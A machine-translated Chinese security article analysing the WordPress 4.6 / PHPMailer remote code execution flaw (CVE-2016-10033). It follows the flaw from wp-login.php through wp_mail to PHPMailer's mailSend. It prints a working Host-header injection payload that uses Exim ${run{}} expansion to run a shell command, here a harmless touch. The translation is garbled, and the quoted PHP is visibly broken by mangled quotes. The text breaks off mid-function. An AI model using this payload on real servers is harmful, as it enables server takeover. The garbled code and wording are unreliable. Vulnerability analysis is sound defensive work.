WordPress 4.6 remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

WordPress 4.6 version remote code execution vulnerability is a very serious vulnerability, an unauthorized attacker to exploit the vulnerability will be able to achieve remote code execution against a target server for instant access, eventually leading to the target application server completely fall in. Without the need for plugins or non-standard settings, you can take advantage of the vulnerability. Dawid Golunski (@dawid_golunski) also in the poc shows us the wonderful alternative / and “ ”(indicates a space)skills.
0×01 vulnerability analysis
The whole process using WordPress is not on the request of the Host field for verification and PHPMailer in less than 5.2.20 version there is a code execution vulnerability. For more than two unsafe point of use, resulting in remote code execution.
The POC address is a WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033we tested the command for the
/usr/bin/touch /tmp/manning. test
We look at the POC sent a request
! [](/Article/UploadPic/2017-5/20175101905266. png? www. myhack58. com)

The Host field is configured as follows
Host: target(any-froot@localhost-be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}manning. test}} null)
This point with our perception of the Host is completely different.
The next process is very simple.
In wp-login.php in the first, according to the request of the action route
! [](/Article/UploadPic/2017-5/20175101905482. png? www. myhack58. com)

Then enter the function retrieve_password
! [](/Article/UploadPic/2017-5/20175101906228. png? www. myhack58. com)

Then enter the wp_mail function located in the file pluggable.php
! [](/Article/UploadPic/2017-5/20175101906330. png? www. myhack58. com)

In wp_mail, WordPress will put _SERVER[‘SERVER_NAME’] variable splicing to from_email variable.
! [](/Article/UploadPic/2017-5/20175101907109. png? www. myhack58. com)

After a series of message content stitching, the object of class phpmailer class variables have been assigned values, then proceeds to call the Send function.
! [](/Article/UploadPic/2017-5/20175101907540. png? www. myhack58. com)

Here the most critical mailSend function stick out, the mailSend function is responsible for the final call, key in the mailPassthru function, which will bring with malicious params variables to PHPMailer it.
protected function mailSend($header, $body)
{
$toArr = array();
foreach ($this->to as $toaddr) {
$toArr[] = $this->addrFormat($toaddr);
}
$to = implode(', ‘, $toArr);
if (empty($this->Sender)) {
$params = ’ ‘;
} else {
$params = sprintf(’-f%s’, $this->Sender);
}
if ($this->Sender != "and ! ini_get(‘safe_mode’)) {
$old_from = ini_get(‘sendmail_from’);
ini_set(‘sendmail_from’, $this->Sender);
}
$result = false;
if ($this->SingleTo && count($toArr) > 1) {
foreach ($toArr as $toAddr) {
$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
$this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
} else {
$result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
$this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
if (isset($old_from)) {
ini_set(‘sendmail_from’, $old_from);

[1] [2] next